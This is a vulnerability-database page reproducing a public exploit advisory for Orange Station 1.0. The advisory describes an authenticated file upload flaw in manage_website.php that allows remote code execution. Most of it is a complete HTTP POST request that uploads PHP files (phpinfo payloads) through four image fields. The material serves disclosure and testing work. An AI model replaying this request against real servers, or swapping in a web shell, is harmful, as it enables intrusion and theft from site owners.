Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNu11secur1tyPACKETSTORM:177764
HistoryMar 26, 2024 - 12:00 a.m.

Orange Station 1.0 Shell Upload

2024-03-2600:00:00
nu11secur1ty
packetstormsecurity.com
79
file upload
remote code execution
server vulnerability
php file
manage_website.php
credential theft

7.4 High

AI Score

Confidence

Low

JSON
`## Title: ORANGE STATION-1.0 File Upload Remote Code Execution Vulnerability  
## Author: nu11secur1ty  
## Date: 03/26/2024  
## Vendor: https://www.mayurik.com/  
## Software: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html  
## Reference: https://portswigger.net/web-security/file-upload,  
https://www.bugcrowd.com/glossary/remote-code-execution-rce/  
  
## Description:  
The parameters back_login_image, login_image, invoice_image, and  
website_image in the manage_website.php application are vulnerable for  
File Upload and the server is vulnerable for Remote code execution  
after this.  
The attacker who has credentials to this system can upload any PHP  
file and he can destroy the system or he can steal a very  
sensitive information.  
  
STATUS: HIGH-CRITICAL Vulnerability  
  
## Exploit:  
```POST  
POST /garage/garage/manage_website.php HTTP/1.1  
Host: pwnedhost.com  
Cookie: PHPSESSID=gu6415ln5mmjknq4ofn8tkab0n  
Content-Length: 1871  
Cache-Control: max-age=0  
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"  
Sec-Ch-Ua-Mobile: ?0  
Sec-Ch-Ua-Platform: "Windows"  
Upgrade-Insecure-Requests: 1  
Origin: https://pwnedhost.com  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryytBZTydZ8OfOJjda  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112  
Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: https://pwnedhost.com/garage/garage/manage_website.php  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Priority: u=0, i  
Connection: close  
  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="title"  
  
Orange Station  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="footer"  
  
Admin Panel  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="short_title"  
  
9090909090  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="currency_code"  
  
Shivaji Nagar, Nashik  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="currency_symbol"  
  
₹  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="old_website_image"  
  
logo.jpg  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="website_image"; filename="info.php"  
Content-Type: application/octet-stream  
  
<?php  
phpinfo();  
?>  
  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="old_invoice_image"  
  
logo.jpg  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="invoice_image"; filename="info.php"  
Content-Type: application/octet-stream  
  
<?php  
phpinfo();  
?>  
  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="old_login_image"  
  
logo.jpg  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="login_image"; filename="info.php"  
Content-Type: application/octet-stream  
  
<?php  
phpinfo();  
?>  
  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="old_back_login_image"  
  
service.jpg  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="back_login_image"; filename="info.php"  
Content-Type: application/octet-stream  
  
<?php  
phpinfo();  
?>  
  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="btn_web"  
  
  
------WebKitFormBoundaryytBZTydZ8OfOJjda--  
```  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2024/03/orange-station-10-multiple-file-upload.html)  
  
## Time spent:  
00:27:00  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and  
https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html  
https://cxsecurity.com/ and https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
`

7.4 High

AI Score

Confidence

Low

JSON